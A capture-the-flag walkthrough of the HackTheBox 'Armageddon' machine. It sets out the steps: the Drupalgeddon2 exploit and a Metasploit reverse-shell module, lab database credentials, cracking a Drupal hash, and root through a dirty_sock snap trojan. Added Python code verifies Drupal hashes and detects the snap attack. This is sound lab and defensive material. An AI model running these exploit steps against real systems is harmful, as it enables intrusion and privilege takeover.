HackTheBox: (“Armageddon”) — Walkthrough
Hi People :D
Today we're going to solve the “Armageddon” machine from HackTheBox, an easy machine that focuses on Drupal exploitation and snap privilege escalation. Let's get started :D
Enumeration
— — — — — —
Start with Nmap
nmap -A 10.10.10.233
We have two open ports (22 and 80), and the results tell us that the website on port 80 is running Drupal 7, so let's navigate to it.
Web Enumeration
— — — — — — — —
We have a simple register/login function, but we can't create a new account because the e-mail cannot be sent; the website says: “Unable to send e-mail …”
Let's move to the next step: fuzzing directories.
We find a lot of files, but /profiles/testing/testing.info is the most important one (I used the Dirsearch tool to perform the fuzzing):
./dirsearch -u http://10.10.10.233/ -e "*" -i 200
The testing.info file gives us the exact Drupal version (“7.56”), so now we can be sure that the website is running Drupal 7.56.
Drupal is a free and open-source web content management framework written in PHP (more information Here).
Let's search for an exploit. I found This GitHub Repo, which contains an automatic exploitation script.
Exploitation
— — — — — —
Let’s download this repo using:
git clone https://github.com/dreadlocked/Drupalgeddon2.git
cd Drupalgeddon2/
Then run the script using:
./drupalgeddon2.rb http://10.10.10.233/
And we easily got a shell as the apache user ☺
Or you can use This Metasploit Module.
First load the module, then set its options:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS 10.10.10.233
set LHOST tun0
exploit
We got an apache user shell from Metasploit successfully ☺
User Flag
— — — — —
After you get the apache shell, move to the /var/www/html/sites/default directory; there are two PHP scripts there that contain the drupaluser credentials (drupaluser:CQHEy@9M*m23gBVj).
You can grep for these creds using:
cat * | grep username && cat * | grep password
These creds work for the MySQL database, so let's try to find any passwords or hashes.
First, log in to the MySQL service (the password follows -p with no space, otherwise mysql takes the next argument as the database name, and it is quoted so the shell does not expand the *):
mysql -u drupaluser -h localhost -p'CQHEy@9M*m23gBVj'
Then list all databases using:
SHOW DATABASES;
Second, switch to the drupal database using:
use drupal;
Then list all tables using:
SHOW TABLES;
We have a users table, which probably contains the users' password hashes.
The last step is to dump the contents of the users table using:
select * from users;
There's the brucetherealadmin hash in the users table ($S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt).
Let's try to crack this hash: first put the hash into a file called hash, then use the john tool with the rockyou wordlist to start the cracking process.
Wait for the tool to finish, then execute john hash --show to see the result.
The hash was successfully cracked and the password is booboo.
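Added example (not from the original writeup): a Python port of Drupal 7's password hashing from includes/password.inc, so you can see what that $S$ string actually encodes. The fourth character (“D”) is the log2 iteration count (2^15 = 32768 rounds of SHA-512), the next eight characters are the salt, and the rest is the phpass-style base64 of the digest, truncated to 55 characters. PAGE_HASH is the hash quoted above; the “$S$Dabcdefgh” setting and the passwords tried in the round trip are constructed. The point for defenders: the stretching only slows a wordlist run, and a password like booboo still falls in seconds.

```python
"""Verifier for Drupal 7 `$S$` password hashes (port of Drupal's
_password_crypt / user_check_password). Added example, not code from the
walkthrough; PAGE_HASH is the hash quoted in the writeup."""
from __future__ import annotations

import hashlib
import hmac
import math

ITOA64 = "./0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz"
HASH_LENGTH = 55            # DRUPAL_HASH_LENGTH: stored strings are cut to this
MIN_LOG2, MAX_LOG2 = 7, 30  # DRUPAL_MIN_HASH_COUNT / DRUPAL_MAX_HASH_COUNT
ALGOS = {"$S$": "sha512", "$H$": "md5", "$P$": "md5"}  # $H$/$P$ = legacy phpass

PAGE_HASH = "$S$DgL2gjv6ZtxBo6CdqZEyJuBphBmrCqIV6W97.oOsUf1xAhaadURt"


def parse_setting(stored: str) -> tuple[int, str]:
    """Split the 12-character setting prefix into (count_log2, salt)."""
    setting = stored[:12]
    if len(setting) != 12 or setting[0] != "$" or setting[2] != "$":
        raise ValueError("not a Drupal 7 hash")
    count_log2 = ITOA64.find(setting[3])
    if not MIN_LOG2 <= count_log2 <= MAX_LOG2:
        raise ValueError("iteration count out of range")
    return count_log2, setting[4:12]


def _phpass_b64(data: bytes) -> str:
    """phpass/Drupal base64: 6-bit groups, little-endian, ITOA64 alphabet."""
    out, i, n = [], 0, len(data)
    while i < n:
        value = data[i]
        i += 1
        out.append(ITOA64[value & 0x3F])
        if i < n:
            value |= data[i] << 8
        out.append(ITOA64[(value >> 6) & 0x3F])
        if i >= n:
            break
        i += 1
        if i < n:
            value |= data[i] << 16
        out.append(ITOA64[(value >> 12) & 0x3F])
        if i >= n:
            break
        i += 1
        out.append(ITOA64[(value >> 18) & 0x3F])
    return "".join(out)


def drupal7_crypt(password: str, setting: str) -> str:
    """Recompute the stored string for `password` under the algorithm,
    iteration count and salt carried in `setting`."""
    algo = ALGOS[setting[:3]]
    count_log2, salt = parse_setting(setting)
    pw = password.encode()
    digest = hashlib.new(algo, salt.encode() + pw).digest()
    for _ in range(1 << count_log2):  # 2**count_log2 further rounds
        digest = hashlib.new(algo, digest + pw).digest()
    output = setting[:12] + _phpass_b64(digest)
    expected = 12 + math.ceil(8 * len(digest) / 6)
    if len(output) != expected:
        raise ValueError("unexpected hash length")
    return output[:HASH_LENGTH]


def verify_password(password: str, stored: str) -> bool:
    """Constant-time comparison, as Drupal's user_check_password() does."""
    try:
        return hmac.compare_digest(drupal7_crypt(password, stored), stored)
    except (KeyError, ValueError):
        return False


if __name__ == "__main__":
    log2, salt = parse_setting(PAGE_HASH)
    print(f"rounds=2^{log2} salt={salt}")
    for guess in ("password", "booboo"):  # constructed guesses
        print(guess, verify_password(guess, PAGE_HASH))
```

Run it directly and it prints the iteration count and salt parsed from the hash, then whether each constructed guess verifies against it.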
We can now SSH into brucetherealadmin using:
ssh brucetherealadmin@10.10.10.233
pass: booboo
And we finally found the user flag ☺
Root Flag
— — — — —
Execute the sudo -l command; you'll see that you can run snap install as root without a password, and the machine is running snap 2.47.1-1.el7.
After some searching, I found This GitHub Repo, which explains privilege escalation through snap by installing an empty devmode snap that adds a new user to the local system; this user will have permission to execute sudo commands.
We're going to use only the trojan part from dirty_sockv2.py.
But before we use it, we should know what it does, right? It's Base64-encoded, so let's decode it.
It adds a new user called dirty_sock together with his password hash using useradd, makes him one of the sudoers using usermod, and gives him full permission with the echo command; the rest of the data is required by the snap package format.
Now let's copy this trojan, remove all the spaces from it, decode it with python and pipe the output into a file called exp.snap, as follows:
Run that command on the machine, then execute sudo /usr/bin/snap install --devmode exp.snap
Now that we've successfully installed the snap package, let's see if it works: run su dirty_sock; it will ask for a password, which is dirty_sock.
Then run the sudo -i command and enter the password again (dirty_sock); you'll get root privileges and can easily grab the root flag ☺
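Added example from the defensive side (not part of the original writeup): a small Python detector for the chain used on this box. It flags a sudoers rule that allows snap install as root (worse with NOPASSWD and a trailing wildcard, which lets the caller pass --devmode), then walks auth-log lines for a snap install run via sudo with --devmode, a new local account created with useradd, that account being added to the sudo or wheel group with usermod, and the new account then invoking sudo. The sudoers text and log lines are constructed samples written in the formats sudo and shadow-utils (useradd/usermod) emit on a CentOS/RHEL-style /var/log/secure; the hostname, PIDs, timestamps and client IP are invented.

```python
"""Detection for the snap devmode privilege-escalation chain described in the
writeup. Added example; all sample data below is constructed."""
from __future__ import annotations

import re
from dataclasses import dataclass

ADMIN_GROUPS = {"sudo", "wheel"}                  # groups that commonly grant sudo
RISKY_SNAP_FLAGS = ("--devmode", "--dangerous")   # bypass confinement / assertions

# Constructed sudoers excerpt, modelled on the `sudo -l` result in the writeup.
SUDOERS_SAMPLE = """\
Defaults    requiretty
root    ALL=(ALL)       ALL
%wheel  ALL=(ALL)       ALL
brucetherealadmin ALL=(root) NOPASSWD: /usr/bin/snap install *
"""

# Constructed /var/log/secure-style lines (sudo and shadow-utils formats).
LOG_SAMPLE = """\
Mar 21 10:02:11 armageddon sshd[2210]: Accepted password for brucetherealadmin from 10.10.14.5 port 50122 ssh2
Mar 21 10:05:40 armageddon sudo: brucetherealadmin : TTY=pts/0 ; PWD=/home/brucetherealadmin ; USER=root ; COMMAND=/usr/bin/snap install --devmode exp.snap
Mar 21 10:05:43 armageddon useradd[2331]: new user: name=dirty_sock, UID=1001, GID=1001, home=/home/dirty_sock, shell=/bin/bash
Mar 21 10:05:43 armageddon usermod[2334]: add 'dirty_sock' to group 'sudo'
Mar 21 10:06:01 armageddon sudo: dirty_sock : TTY=pts/1 ; PWD=/home/dirty_sock ; USER=root ; COMMAND=/bin/bash
"""

SUDO_RE = re.compile(r"sudo:\s+(?P<user>\S+)\s+:.*?COMMAND=(?P<cmd>.+)$")
USERADD_RE = re.compile(r"useradd\[\d+\]: new user: name=(?P<name>[^,]+)")
USERMOD_RE = re.compile(r"usermod\[\d+\]: add '(?P<name>[^']+)' to group '(?P<group>[^']+)'")


@dataclass
class Finding:
    kind: str
    detail: str


def risky_sudo_rules(sudoers_text: str) -> list[str]:
    """Return sudoers rules that let someone run `snap install` as root.
    Such a rule is effectively full root: snap install accepts --devmode,
    and a trailing wildcard lets the caller choose flags and the file."""
    hits = []
    for line in sudoers_text.splitlines():
        line = line.strip()
        if not line or line.startswith(("#", "Defaults")) or "snap install" not in line:
            continue
        reasons = ["snap install as root is equivalent to root"]
        if "NOPASSWD" in line:
            reasons.append("no password required")
        if line.endswith("*"):
            reasons.append("wildcard permits arbitrary flags such as --devmode")
        hits.append(f"{line}  [{'; '.join(reasons)}]")
    return hits


def suspicious_events(log_text: str) -> list[Finding]:
    """Scan auth-log lines in order and report: a devmode/dangerous snap
    install via sudo, a new local user, that user joining an admin group,
    and any sudo use by an account created earlier in the same log."""
    findings: list[Finding] = []
    new_users: set[str] = set()
    for line in log_text.splitlines():
        if m := SUDO_RE.search(line):
            user, cmd = m.group("user"), m.group("cmd").strip()
            if "snap install" in cmd and any(f in cmd for f in RISKY_SNAP_FLAGS):
                findings.append(Finding("devmode_snap_install", f"{user} ran: {cmd}"))
            elif user in new_users:
                findings.append(Finding("sudo_by_new_user", f"{user} ran: {cmd}"))
        elif m := USERADD_RE.search(line):
            new_users.add(m.group("name"))
            findings.append(Finding("new_local_user", m.group("name")))
        elif m := USERMOD_RE.search(line):
            if m.group("group") in ADMIN_GROUPS:
                findings.append(Finding("admin_group_add", f"{m.group('name')} -> {m.group('group')}"))
    return findings


if __name__ == "__main__":
    for rule in risky_sudo_rules(SUDOERS_SAMPLE):
        print("SUDOERS:", rule)
    for f in suspicious_events(LOG_SAMPLE):
        print(f"{f.kind:22} {f.detail}")
```

The sudoers check is the preventive half (a rule like this should simply not exist; if snap installs must be delegated, restrict them to a fixed path without a wildcard), and the log walk is the detective half: a useradd followed within seconds by a usermod into sudo or wheel and then sudo activity from that new account is the signature the trojan snap leaves behind.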
Thanks for reading and I hope you loved this writeup ❤.
You can give me a Respect on my HackTheBox Account (if you want :D).